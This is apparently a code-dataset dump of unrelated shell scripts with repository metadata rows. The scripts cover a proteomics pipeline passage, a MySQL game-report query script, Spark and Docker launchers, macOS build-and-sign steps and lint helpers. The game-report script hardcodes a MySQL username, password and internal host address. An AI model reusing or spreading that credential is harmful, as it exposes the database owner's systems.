LC_ALL=C fgrep -w $Line _$i | sort -t $'\t' -i -u -k2,2 | sort -t $'\t' -i -u -k $Quant,$Quant >> _pep
else
LC_ALL=C fgrep -w $Line _$i | sort -t $'\t' -i -u -k2,2 >> _pep
fi
## echo $Line "######"
## tail -n1 _pep
## echo "######"
## scan=`grep -w $Line _$i | awk '{print $2}' | sort -u`;
## grep -w $Line _$i > _pepTemp
## for SC in $scan
## do
## grep -w $SC _pepTemp |sort -t $'\t' -r -u -k $Quant,$Quant | head -n1 >> _pep
## done
awk -F"\t" -v EXP="$Exp_Name" -v Label=$Label -v file="$name" -f /research/labs/proteomics/pandey/m202766/programs/consldt_sum.awk _pep ## >> $name\_sum.xls
## awk -F"\t" -v EXP="$Exp_Name" -v Label=$Label -f /xinyanwu/MS_databases/programs/GoDaddy/consldt_ave.awk _pep >> $name\_ave.xls
## awk -F"\t" -v EXP="$Exp_Name" -v Label=$Label -f /xinyanwu/MS_databases/programs/GoDaddy/consldt_max.awk _pep >> $name\_max.xls
percent=`echo $n $No_uniqPep | awk '{printf "%0.3f", $1/$2*100}'`
CurrentTTIME=$(date +%s)
time=$(($CurrentTTIME - $STARTTIME))
Ntime=`echo $time $n $No_uniqPep |awk '{printf "%0.0f", ($3-$2)*($1/$2);}'`
((sec=time%60, m=time/60, min=m%60, hrs=m/60))
timespnt=$(printf "%02d:%02d:%02d" $hrs $min $sec)
((sec=Ntime%60, m=Ntime/60, min=m%60, hrs=m/60))
timeneed=$(printf "%02d:%02d:%02d" $hrs $min $sec)
echo -ne " \r$n/$No_uniqPep; $percent%; Spent $timespnt and need ~ $timeneed to finish."
done < _uniqPep
printf "\n\n"
echo "> Assigning phosphorylation sites based on peptide and protein sequences."
echo $DB
/research/labs/proteomics/pandey/m202766/programs/gi2gensymb2 $name\_ave.xls $DB
echo "> Merging peptides and protein information with quantification values."
/research/labs/proteomics/pandey/m202766/programs/merg $name\_Sites_T.xls
/research/labs/proteomics/pandey/m202766/programs/Site_quant $name\_Sites_T_ave.xls
fi
if [ "$Label" = "NONE" ]; then
echo "> Assigning phosphorylation sites based on peptide and protein sequences."
cp _uniqPep $name\_pep.xls
/research/labs/proteomics/pandey/m202766/programs/gi2gensymb2 $name\_pep.xls $DB
echo "> Merging peptides and protein information."
/research/labs/proteomics/pandey/m202766/programs/merg $name\_Sites_T.xls
fi
/research/labs/proteomics/pandey/m202766/programs/Site_quant $name\_Sites_T_ave.xls
## rm _*
## cd ..
done
_endtime=$(date +%s)
_time=$(($_endtime - $_starttime))
((sec=_time%60, m=_time/60, min=m%60, hrs=m/60))
_timespnt=$(printf "%02d:%02d:%02d" $hrs $min $sec)
echo -ne " \\r Takes $_timespnt to finish all consolidation procedures."
printf "\n\n";
ls
printf "\n\n";
| true |
30fe4b678132dcfaf91da90eac96aea8db5289d0 | Shell | dawnbreaks/taomee | /hadoop/game-report/eqin/webapp/hero_search_v2 | UTF-8 | 2,040 | 3.078125 | 3 | [] | no_license | #!/bin/sh
. /etc/profile
PROJECT=$1;
STARTTIME=$2
ENDTIME=$3
MIMIID=$4
GAMEZONE=$5
REMOTE_EXEC_SQL="mysql -ugamereport -pOH2%wx12KB --skip-column-names --host=192.168.71.45"
DB="hadoopdailyresult"
#YM=`echo $TIME | sed "s/-/\t/g" | awk '{print $1$2}'`
#YM=`date -d "${STARTTIME}" +%Y%m`
RESULTFILE="search_result" > $RESULTFILE
TEMPFILE="tmp" > $TEMPFILE
function search()
{
YM=$1
echo "select * from ${DB}.${PROJECT}_ItemTopN_${YM} where id = '${MIMIID}' and time >= '${STARTTIME}' and time <= '${ENDTIME}'" | $REMOTE_EXEC_SQL | awk -F'\t' '{print $1","$2",ItemTopN,"$3","$4}' >> $RESULTFILE
echo "select * from ${DB}.${PROJECT}_battletopn_${YM} where id = '${MIMIID}' and time >= '${STARTTIME}' and time <= '${ENDTIME}'" | $REMOTE_EXEC_SQL | awk -F'\t' '{print $1","$2",battletopn,"$3","$4}' >> $RESULTFILE
echo "select * from ${DB}.${PROJECT}_EXPTOPN_${YM} where id = '${MIMIID}' and time >= '${STARTTIME}' and time <= '${ENDTIME}'" | $REMOTE_EXEC_SQL | awk -F'\t' '{print $1","$2",EXPTOPN,"$3","$4}' >> $RESULTFILE
echo "select * from ${DB}.${PROJECT}_XIAOMEETOPN_${YM} where id = '${MIMIID}' and time >= '${STARTTIME}' and time <= '${ENDTIME}'" | $REMOTE_EXEC_SQL | awk -F'\t' '{print $1","$2",XIAOMEETOPN,"$3","$4}' >> $RESULTFILE
echo "select * from ${DB}.${PROJECT}_xiaomee_${YM} where id = '${MIMIID}' and time >= '${STARTTIME}' and time <= '${ENDTIME}'" | $REMOTE_EXEC_SQL | awk -F'\t' '{print $1","$2",xiaomee,"$3","$4}' >> $RESULTFILE
echo "select * from ${DB}.${PROJECT}_HeroCmdFreqTopN_${YM} where uid = '${MIMIID}' and time >= '${STARTTIME}' and time <= '${ENDTIME}'" | $REMOTE_EXEC_SQL | awk -F'\t' '{print $1","$2",HeroCmdFreqTopN,"$5","$6}' >> $RESULTFILE
}
SM=`date -d "${STARTTIME}" +%Y%m`
EM=`date -d "${ENDTIME}" +%Y%m`
CD=$STARTTIME
CM=0
if [ $SM == $EM ] ; then
search $SM
else
search $SM
until [ $CM == $EM ]
do
CD=`date -d "$CD +1 month" +%Y%m%d`
CM=`date -d "$CD" +%Y%m`
search $CM
done
fi
echo "QUIT" | $REMOTE_EXEC_SQL
DIR=$HOME/eqin/webapp;
echo ${DIR}/${RESULTFILE}
exit
| true |
102ec01e2ca5662b7fa4f597f51883560fb58f87 | Shell | giagulei/IReS-Platform | /asap-platform/asap-server/asapLibrary/operators/Wind_Distribution_Computation_Spark/Wind_Distribution_Computation_Spark.sh | UTF-8 | 828 | 2.546875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
<<INFO
Author : Papaioannou Vassilis
Last update : 28/ 03/ 2016
Previous updates : 09/ 02/ 2016
Platform : ASAP IReS
Github : https://github.com/project-asap/IReS-Platform
Work package : Telecom analytics
Github : https://github.com/project-asap/telecom-analytics/blob/current/docs/PeakDetection.md
INFO
<<DESCRIPTION
DESCRIPTION
source /home/forth/asap-venv/bin/activate
echo -e "Starting typical_distribution_computation.py script for Distribution_Computation_Scala operator ..."
SPARK_PORT=$1
OPERATOR=$2
REGION=$3
TIMEFRAME=$4
REGION="roma"
TIMEFRAME="june-2015"
SPARK_HOME=/home/forth/asap4all/spark-1.5.2-bin-hadoop2.6
$SPARK_HOME/bin/spark-submit --master $SPARK_PORT $OPERATOR $REGION $TIMEFRAME
echo -e "... typical_distribution_computation.py script for Distribution_Computation_Scala operator ended"
| true |
036fd0e6659787025d5ca386d30963457b6ae0df | Shell | AgoraIO/API-Examples | /.github/ci/build/build_mac_ipa.sh | UTF-8 | 3,562 | 2.984375 | 3 | [
"MIT"
] | permissive | CURRENT_PATH=$PWD
# 获取项目目录
PROJECT_PATH="$( cd "$1" && pwd )"
cd ${PROJECT_PATH} && pod install
if [ $? -eq 0 ]; then
echo " pod install success"
else
echo " pod install failed"
exit 1
fi
# 项目target名
TARGET_NAME=${PROJECT_PATH##*/}
KEYCENTER_PATH=${PROJECT_PATH}"/"${TARGET_NAME}"/Common/KeyCenter.swift"
# 打包环境
CONFIGURATION=Release
#工程文件路径
APP_PATH="${PROJECT_PATH}/${TARGET_NAME}.xcworkspace"
#工程配置路径
PBXPROJ_PATH="${PROJECT_PATH}/${TARGET_NAME}.xcodeproj/project.pbxproj"
echo PBXPROJ_PATH: $PBXPROJ_PATH
# 主项目工程配置
# Debug
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:CODE_SIGN_STYLE 'Manual'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:CODE_SIGN_IDENTITY 'Developer ID Application'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:DEVELOPMENT_TEAM 'YS397FG5PA'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:PROVISIONING_PROFILE_SPECIFIER 'apiexamplemac'" $PBXPROJ_PATH
# Release
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:CODE_SIGN_STYLE 'Manual'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:CODE_SIGN_IDENTITY 'Developer ID Application'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:DEVELOPMENT_TEAM 'YS397FG5PA'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:PROVISIONING_PROFILE_SPECIFIER 'apiexamplemac'" $PBXPROJ_PATH
#修改build number
# Debug
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:CURRENT_PROJECT_VERSION ${BUILD_NUMBER}" $PBXPROJ_PATH
# Release
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:CURRENT_PROJECT_VERSION ${BUILD_NUMBER}" $PBXPROJ_PATH
# 读取APPID环境变量
echo AGORA_APP_ID:$APP_ID
echo $AGORA_APP_ID
echo PROJECT_PATH: $PROJECT_PATH
echo TARGET_NAME: $TARGET_NAME
echo KEYCENTER_PATH: $KEYCENTER_PATH
echo APP_PATH: $APP_PATH
#修改Keycenter文件
python3 /tmp/jenkins/api-examples/.github/ci/build/modify_ios_keycenter.py $KEYCENTER_PATH 0
if [ $? -eq 0 ]; then
echo "修改Keycenter文件 success"
else
echo "修改Keycenter文件 failed"
exit 1
fi
# Xcode clean
xcodebuild clean -workspace "${APP_PATH}" -configuration "${CONFIGURATION}" -scheme "${TARGET_NAME}"
# 时间戳
CURRENT_TIME=$(date "+%Y-%m-%d %H-%M-%S")
# 归档路径
ARCHIVE_PATH="${WORKSPACE}/${TARGET_NAME}_${BUILD_NUMBER}.xcarchive"
# 编译环境
# plist路径
PLIST_PATH="${PROJECT_PATH}/ExportOptions.plist"
echo PLIST_PATH: $PLIST_PATH
# archive 这边使用的工作区间 也可以使用project
xcodebuild archive -workspace "${APP_PATH}" -scheme "${TARGET_NAME}" -configuration "${CONFIGURATION}" -archivePath "${ARCHIVE_PATH}"
cd ${WORKSPACE}
# 压缩archive
7za a -slp "${TARGET_NAME}_${BUILD_NUMBER}.xcarchive.zip" "${ARCHIVE_PATH}"
# 签名
sh sign "${WORKSPACE}/${TARGET_NAME}_${BUILD_NUMBER}.xcarchive.zip" --type xcarchive --plist "${PLIST_PATH}" --application macApp
# 上传IPA
python3 artifactory_utils.py --action=upload_file --file="${TARGET_NAME}_${BUILD_NUMBER}.app.zip" --project
# 删除archive文件
rm -rf ${TARGET_NAME}_${BUILD_NUMBER}.xcarchive
rm -rf *.zip
#复原Keycenter文件
python3 /tmp/jenkins/api-examples/.github/ci/build/modify_ios_keycenter.py $KEYCENTER_PATH 1
| true |
cd64b8563fae29aa4006bb4cdcdc368812a34fcf | Shell | PalakPartani/UserRegistrationProblem | /UserRegistration.sh | UTF-8 | 1,068 | 3.703125 | 4 | [] | no_license | #!/bin/bash -x
echo "Welcome to user registration problem "
userNamePattern="[A-Z]{1}[A-Za-z]{2,}"
emailIdPattern="^[A-Za-z]*([.|+|-|_]?[A-Za-z]+)?[@]{1}[A-Za-z]{2,}[.]{1}[A-Za-z]{2,}([.]?[A-Za-z]{2,})?$"
checkNumber="^[1-9]{2}\s?[1-9]{1}[0-9]{9}$"
checkPassword="^[A-Za-z]{8}"
checkPassword="^[A-Z]{1,}[A-Za-z]{8,}$"
#function for atleast one numeric value
function checkAtleastOneDigit() {
if [[ $1 =~ [[:upper:]] && [[:digit:]] && ${#1} -ge 8 ]]
then
echo "Valid"
else
echo "Invalid"
fi
}
#function to check validation
function checkUserDetails(){
if [[ $1 =~ $2 ]]
then
echo "Valid !"
else
echo "Invalid!"
fi
}
echo "Enter Username:"
read firstName
checkUserDetails $firstName $userNamePattern
read lastName
checkUserDetails $lastName $userNamePattern
echo "Enter Emailid :"
read emailId
checkUserDetails $emailId $emailIdPattern
echo "Enter mobile no preceeding country code "
read number
checkUserDetails $number $checkNumber
echo "enter Password :"
read password
checkUserDetails $password $checkPassword
checkAtleastOneDigit $password
| true |
2044cbe5e84eca78ace802ea679fcb6b4e0bc9f6 | Shell | tnakaicode/jburkardt | /fd1d_advection_ftcs/fd1d_advection_ftcs.sh | UTF-8 | 376 | 2.734375 | 3 | [] | no_license | #!/bin/bash
#
g++ -c fd1d_advection_ftcs.cpp
if [ $? -ne 0 ]; then
echo "Errors compiling fd1d_advection_ftcs.cpp"
exit
fi
#
g++ fd1d_advection_ftcs.o -lm
if [ $? -ne 0 ]; then
echo "Errors linking fd1d_advection_ftcs.o"
exit
fi
#
rm fd1d_advection_ftcs.o
mv a.out ~/bincpp/$ARCH/fd1d_advection_ftcs
#
echo "Executable installed as ~/bincpp/$ARCH/fd1d_advection_ftcs"
| true |
8de070a0cce9c6c23a33bacf64279b8ad0143b3f | Shell | digoal/bottledwater-pg | /build/bottledwater-docker-wrapper.sh | UTF-8 | 620 | 2.671875 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/sh
POSTGRES_CONNECTION_STRING="hostaddr=$POSTGRES_PORT_5432_TCP_ADDR port=$POSTGRES_PORT_5432_TCP_PORT dbname=postgres user=postgres"
KAFKA_BROKER="$KAFKA_PORT_9092_TCP_ADDR:$KAFKA_PORT_9092_TCP_PORT"
if [ -n "$SCHEMA_REGISTRY_PORT_8081_TCP_ADDR" ]; then
SCHEMA_REGISTRY_URL="http://${SCHEMA_REGISTRY_PORT_8081_TCP_ADDR}:${SCHEMA_REGISTRY_PORT_8081_TCP_PORT}"
schema_registry_opts="--schema-registry=$SCHEMA_REGISTRY_URL"
else
schema_registry_opts=
fi
exec /usr/local/bin/bottledwater \
--postgres="$POSTGRES_CONNECTION_STRING" \
--broker="$KAFKA_BROKER" \
$schema_registry_opts \
"$@"
| true |
9f04fe6c26ac73181982d63019bff9d018419b8f | Shell | LRelar/cwr_last | /run.sh | UTF-8 | 440 | 3.328125 | 3 | [] | no_license | rm -rf corFiles/*/*.cor
rm -rf corFiles/*/*.log
rm -rf result
date="$(date)"
for i in $(find champs -maxdepth 1 -name *.s);
do
./asm $i >> corFiles/our/run$date.log
f="$(basename -s .s $i)"
echo "$f"
chmod 777 champs/$f.cor
mv champs/*.cor corFiles/our
./asm-school $i >> corFiles/school/run$date.log
chmod 777 champs/$f.cor
mv champs/*.cor corFiles/school
diff corFiles/our/$f.cor corFiles/school/$f.cor >> result
done
| true |
488f0d940895f6e758bac3e87f9f5e4e5a91493e | Shell | hashbang/shell-etc | /network/if-down.d/upstart | UTF-8 | 332 | 2.9375 | 3 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | #!/bin/sh -e
if [ -e /lib/lsb/init-functions ]; then
. /lib/lsb/init-functions
fi
if ! init_is_upstart; then
exit 0
fi
# Let's ignore meta entries (ifdown -a)
if [ "$ADDRFAM" = "meta" ]; then
exit 0
fi
initctl emit -n net-device-down \
"IFACE=$IFACE" \
"LOGICAL=$LOGICAL" \
"ADDRFAM=$ADDRFAM" \
"METHOD=$METHOD"
| true |
9f8e78be4a9000680dd262fd215e3c1205dd597b | Shell | shuangyichen/tmp | /fedml_experiments/distributed/fedavg/run_fedavg_pytorch.sh | UTF-8 | 684 | 2.53125 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
CLIENT_NUM=$1
WORKER_NUM=$2
MODEL=$3
DISTRIBUTION=$4
ROUND=$5
EPOCH=$6
BATCH_SIZE=$7
LR=$8
DATASET=$9
DATA_DIR=${10}
CLIENT_OPTIMIZER=${11}
CI=${12}
PROCESS_NUM=`expr $CLIENT_NUM + 1`
echo $PROCESS_NUM
#hostname > mpi_host_file
mpirun -np $PROCESS_NUM python3 ./main_fedavg.py \
--model $MODEL \
--dataset $DATASET \
--data_dir $DATA_DIR \
--partition_method $DISTRIBUTION \
--client_num_in_total $CLIENT_NUM \
--client_num_per_round $WORKER_NUM \
--comm_round $ROUND \
--epochs $EPOCH \
--client_optimizer $CLIENT_OPTIMIZER \
--batch_size $BATCH_SIZE \
--lr $LR \
--ci $CI
| true |
6c795a2ca32df519710522df206e4f6645dde8ff | Shell | badboy/whatrustisit | /build.sh | UTF-8 | 1,125 | 3.875 | 4 | [] | no_license | #!/bin/bash
if command -v gsed 2>/dev/null; then
SED=gsed
else
SED=sed
fi
stable() {
rustup toolchain add stable >&2
rustup run stable rustc --version | egrep -o '1\.[0-9]+\.[0-9]+'
}
beta() {
rustup toolchain add beta >&2
rustup run beta rustc --version | \
$SED 's/.\+\(1\.[0-9]\+\.[0-9]\+[^ ]*\).*/\1/'
}
nightly() {
rustup toolchain add nightly >&2
rustup run nightly rustc --version | \
$SED 's/.\+\(1\.[0-9]\+\.[0-9]\+\)-nightly ([0-9a-f]\+ \(.\+\))/\1 (\2)/'
}
pickdate() {
echo "$1" | $SED 's/\(1\.[0-9]\+\.[0-9]\+\) (\(.\+\))/\2/'
}
rustup update
s=$(stable)
b=$(beta)
n=$(nightly)
nightlyDate=$(pickdate "$n")
$SED \
-e "s/{STABLE}/$s/" \
-e "s/{BETA}/$b/" \
-e "s/{NIGHTLY}/$n/" \
index.html.tmpl > index.html
cat <<EOS > stable
[toolchain]
channel = "$s"
EOS
# We can't pick the beta version without knowing the _exact_ release date,
# which is not even exposed anywhere.
# Maybe we can eventually parse https://static.rust-lang.org/manifests.txt
cat <<EOS > beta
[toolchain]
channel = "beta"
EOS
cat <<EOS > nightly
[toolchain]
channel = "nightly-${nightlyDate}"
EOS
| true |
e5984bc2aef5d9f56eb1581a59d92be016654f2f | Shell | panoptesDev/Panoptes_master | /scripts/build-downstream-projects.sh | UTF-8 | 2,722 | 3.546875 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
#
# Builds known downstream projects against local panoptes source
#
set -e
cd "$(dirname "$0")"/..
source ci/_
source scripts/read-cargo-variable.sh
panoptes_ver=$(readCargoVariable version sdk/Cargo.toml)
panoptes_dir=$PWD
cargo="$panoptes_dir"/cargo
cargo_build_bpf="$panoptes_dir"/cargo-build-bpf
cargo_test_bpf="$panoptes_dir"/cargo-test-bpf
mkdir -p target/downstream-projects
cd target/downstream-projects
update_panoptes_dependencies() {
declare tomls=()
while IFS='' read -r line; do tomls+=("$line"); done < <(find "$1" -name Cargo.toml)
sed -i -e "s#\(panoptes-program = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
sed -i -e "s#\(panoptes-program-test = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
sed -i -e "s#\(panoptes-sdk = \"\).*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
sed -i -e "s#\(panoptes-sdk = { version = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
sed -i -e "s#\(panoptes-client = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
sed -i -e "s#\(panoptes-client = { version = \"\)[^\"]*\(\"\)#\1$panoptes_ver\2#g" "${tomls[@]}" || return $?
}
patch_crates_io() {
cat >> "$1" <<EOF
[patch.crates-io]
panoptes-client = { path = "$panoptes_dir/client" }
panoptes-program = { path = "$panoptes_dir/sdk/program" }
panoptes-program-test = { path = "$panoptes_dir/program-test" }
panoptes-sdk = { path = "$panoptes_dir/sdk" }
EOF
}
example_helloworld() {
(
set -x
rm -rf example-helloworld
git clone https://github.com/panoptes-labs/example-helloworld.git
cd example-helloworld
update_panoptes_dependencies src/program-rust
patch_crates_io src/program-rust/Cargo.toml
echo "[workspace]" >> src/program-rust/Cargo.toml
$cargo_build_bpf \
--manifest-path src/program-rust/Cargo.toml
# TODO: Build src/program-c/...
)
}
spl() {
(
set -x
rm -rf spl
git clone https://github.com/panoptes-labs/panoptes-program-library.git spl
cd spl
./patch.crates-io.sh "$panoptes_dir"
$cargo build
$cargo test
$cargo_test_bpf
)
}
serum_dex() {
(
set -x
rm -rf serum-dex
git clone https://github.com/project-serum/serum-dex.git
cd serum-dex
update_panoptes_dependencies .
patch_crates_io Cargo.toml
patch_crates_io dex/Cargo.toml
cat >> dex/Cargo.toml <<EOF
[workspace]
exclude = [
"crank",
]
EOF
$cargo build
$cargo_build_bpf \
--manifest-path dex/Cargo.toml --no-default-features --features program
$cargo test \
--manifest-path dex/Cargo.toml --no-default-features --features program
)
}
_ example_helloworld
#_ spl
_ serum_dex
| true |
55a952a111271fefc9fbfed3cd018f271cb67564 | Shell | arenadata/gpdb | /src/bin/pg_rewind/sql/pg_xlog_symlink.sql | UTF-8 | 1,895 | 3.40625 | 3 | [
"LicenseRef-scancode-rsa-md4",
"OLDAP-2.8",
"HPND-sell-variant",
"BSD-4-Clause-UC",
"Zlib",
"LicenseRef-scancode-zeusbench",
"LicenseRef-scancode-openssl",
"bzip2-1.0.6",
"LicenseRef-scancode-ssleay-windows",
"Beerware",
"LicenseRef-scancode-mit-modification-obligations",
"LicenseRef-scancode-sun-bcl-sdk-5.0",
"BSD-3-Clause",
"W3C-19980720",
"PostgreSQL",
"LicenseRef-scancode-rsa-1990",
"LicenseRef-scancode-other-copyleft",
"metamail",
"X11-distribute-modifications-variant",
"Spencer-94",
"NTP",
"W3C",
"ISC",
"RSA-MD",
"LicenseRef-scancode-pcre",
"LicenseRef-scancode-stream-benchmark",
"Apache-2.0",
"BSD-2-Clause",
"LicenseRef-scancode-other-permissive",
"Python-2.0",
"curl",
"OpenSSL",
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | #!/bin/bash
# This file has the .sql extension, but it is actually launched as a shell
# script. This contortion is necessary because pg_regress normally uses
# psql to run the input scripts, and requires them to have the .sql
# extension, but we use a custom launcher script that runs the scripts using
# a shell instead.
TESTNAME=pg_xlog_symlink
. sql/config_test.sh
# Change location of pg_xlog and symlink to new location
function before_master
{
TEST_XLOG=$TESTROOT/$TESTNAME/pg_xlog
rm -rf $TEST_XLOG
mkdir $TEST_XLOG
cp -r $TEST_MASTER/pg_xlog/* $TEST_XLOG/
rm -rf $TEST_MASTER/pg_xlog
ln -s $TEST_XLOG $TEST_MASTER/pg_xlog
}
# Do an insert in master.
function before_standby
{
PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL <<EOF
CREATE TABLE tbl1 (d text);
INSERT INTO tbl1 VALUES ('in master');
CHECKPOINT;
EOF
}
function standby_following_master
{
# Insert additional data on master that will be replicated to standby
PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL -c "INSERT INTO tbl1 values ('in master, before promotion');"
# Launch checkpoint after standby has been started
PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL -c "CHECKPOINT;"
}
# This script runs after the standby has been promoted. Old Master is still
# running.
function after_promotion
{
# Insert a row in the old master. This causes the master and standby to have
# "diverged", it's no longer possible to just apply the standy's logs over
# master directory - you need to rewind.
PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL -c "INSERT INTO tbl1 VALUES ('in master, after promotion');"
# Also insert a new row in the standby, which won't be present in the old
# master.
PGOPTIONS=${PGOPTIONS_UTILITY} $STANDBY_PSQL -c "INSERT INTO tbl1 VALUES ('in standby, after promotion');"
}
function after_rewind
{
PGOPTIONS=${PGOPTIONS_UTILITY} $MASTER_PSQL -c "SELECT * from tbl1"
}
# Run the test
. sql/run_test.sh
| true |
8e7a9f407cb224fcd01ed159bf33c5a020721063 | Shell | janxb/ServerUtils | /lxd-create | UTF-8 | 1,485 | 3.859375 | 4 | [
"Unlicense"
] | permissive | #!/bin/bash
set -e
if [ "$#" -ne 2 ]; then
echo "Illegal number of parameters."
echo "Usage: lxd-create IMAGE_NAME CONTAINER_NAME"
echo "Example: lxd-create ubuntu:lts c1"
echo "Example: lxd-create images:debian/bullseye c1"
exit 1
fi
lxc launch $1 $2
echo "Updating package lists"
lxc exec $2 -- apt-get update &>/dev/null
TOOLS="wget nano git htop iotop iftop net-tools unattended-upgrades"
echo "Installing additional packages ($TOOLS)"
lxc exec $2 -- apt-get install $TOOLS -y &>/dev/null
SU_PATH="/usr/local/sbin"
echo "Fetching ServerUtils into $SU_PATH"
lxc exec $2 -- git clone https://github.com/janxb/ServerUtils.git $SU_PATH &>/dev/null
echo "Upgrading packages"
lxc exec $2 -- do-package-upgrades -y &>/dev/null
echo "Configuring unattended upgrades"
TMP_FILENAME="/tmp/"$(random-string)
printf '
APT::Periodic::Enable "1";
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Download-Upgradeable-Packages "1";
APT::Periodic::Unattended-Upgrade "1";
APT::Periodic::AutocleanInterval "14";
APT::Periodic::Verbose "0";
' > $TMP_FILENAME
lxc file push $TMP_FILENAME "$2/etc/apt/apt.conf.d/10periodic" &>/dev/null
lxc file delete "$2/etc/apt/apt.conf.d/20auto-upgrades" &>/dev/null || true
rm $TMP_FILENAME
TMP_FILENAME="/tmp/"$(random-string)
printf '
Unattended-Upgrade::Origins-Pattern {
"origin=*";
};
' > $TMP_FILENAME
lxc file push $TMP_FILENAME "$2/etc/apt/apt.conf.d/50unattended-upgrades" &>/dev/null
rm $TMP_FILENAME
echo Container created: $2
| true |
41247264cce26f8307e3df9b06198e8c393a1e5b | Shell | noah/dotzsh | /09_xorg | UTF-8 | 670 | 2.84375 | 3 | [] | no_license | # poor man's display manager
#
if [[ -z "$DISPLAY" ]] && [[ $(tty) = /dev/tty1 ]]; then
# ~/.xinitrc decides which wm to use
exec startx > ~/logs/startx.log 2>&1
else
# don't start keychain if logging in from tty
# [[ -f ~/.ssh/id_dsa ]] && /usr/bin/keychain --timeout 999999 --quiet --nogui ~/.ssh/id_dsa
[[ -f ~/.ssh/id_rsa ]] && /usr/bin/keychain --timeout 999999 --quiet --nogui ~/.ssh/id_rsa
# [[ -f ~/.ssh/id_ed25519 ]] && /usr/bin/keychain --quiet --nogui ~/.ssh/id_ed25519
[[ -f ~/.keychain/$HOST-sh ]] && . ~/.keychain/$HOST-sh
# [[ -f ~/.keychain/$HOST-sh-gpg ]] && . ~/.keychain/$HOST-sh-gpg
fi
# vim: ft=zsh
| true |
d1f55f328c5d4152503f58fddfb0e24d20e1d8e0 | Shell | aristidetraian/debiansetup | /vidscript.sh | UTF-8 | 210 | 3.125 | 3 | [] | no_license | #!/bin/bash
#FILES=/path/to/*
for f in `ls -d */`
do
echo "Processing $f file..."
cp vid.v1.py $f
cd $f
python vid.v1.py
cd ..
# take action on each file. $f store current file name
done
| true |
d129b326d5c09ecd33c88a191b8bdc7ff87fc9a1 | Shell | tridactyl/tridactyl | /scripts/common.sh | UTF-8 | 1,863 | 4.0625 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# Accepts no arguments
# Returns git-add'ed files as a list of filenames separated by a newline character
cachedTSLintFiles() {
git diff --cached --name-only --diff-filter=ACM "*.ts" "*.tsx" ":(exclude)*.d.ts" ":(exclude)tests/*" ":(exclude)*test.ts" ":(exclude)e2e_tests/*"
}
# Accepts no arguments
# Returns git-add'ed files as a list of filenames separated by a newline character
cachedPrettierFiles() {
git diff --cached --name-only --diff-filter=ACM "*.md" "*.css"
}
# Accepts a single argument which is the name of a file tracked by git
# Returns a string which is the content of the file as stored in the git index
staged() {
git show :"$1"
}
# Accepts a single string argument made of multiple file names separated by a newline
# Returns an array of files that prettier wants to lint
prettierUgly() {
local acc=""
local IFS=$'\n'
for jsfile in $1; do
diff <(staged "$jsfile") <(staged "$jsfile" | "$(yarn bin)/prettier" --stdin-filepath "$jsfile") >/dev/null || acc="$jsfile"$'\n'"$acc"
done
echo "$acc"
}
eslintUgly() {
local acc=""
local IFS=$'\n'
local tmpdir
mkdir -p ".tmp"
if [[ "$(uname)" == "Darwin" ]]; then
tmpdir=$(gmktemp --tmpdir=".tmp/" -d "tslint.XXXXXXXXX")
else
tmpdir=$(mktemp --tmpdir=".tmp/" -d "tslint.XXXXXXXXX")
fi
for jsfile in "$@"; do
tmpfile="$tmpdir/$jsfile"
mkdir -p "$(dirname "$tmpfile")"
staged "$jsfile" > "$tmpfile"
"$(yarn bin)/eslint" --no-ignore --quiet -o /dev/null "$tmpfile" || acc="$jsfile"$'\n'"$acc"
done
rm -rf "$tmpdir"
echo "$acc"
}
noisy() {
local acc=()
for jsfile in "$@"; do
if [ "$(git diff --cached "$jsfile" | grep '^+.*console.log' -c)" -gt '0' ] ; then
acc+=("jsfile")
fi
done
echo "${acc[@]}"
}
| true |
4aeae808dce1f02525a72d92256c389a1e4cba60 | Shell | marqusm/bash-scripts | /utils/sync.sh | UTF-8 | 1,027 | 3.65625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
# Constants and default values
ROOT_NAME="<ROOT_FOLDER>"
WORKING_FOLDER_NAME="<WORKING_FOLDER_NAME>"
FILE_PREFIX="<FILE_PREFIX>"
FILE_EXTENSION=".dat"
SERVER_PATH="<SERVER_PATH>"
PASSWORD="<PASSWORD>"
BANDWIDTH_LIMIT="<BANDWIDTH_LIMIT>"
CIPHER_ALGORITHM="AES256"
# Parameters
if [ -n "$1" ]
then
BANDWIDTH_LIMIT=$1
fi
FOLDER=${ROOT_NAME}"/"${WORKING_FOLDER_NAME}
FILE_NAME=${FILE_PREFIX}"-`date +%s`"
FINAL_NAME=${FILE_NAME}""${FILE_EXTENSION}
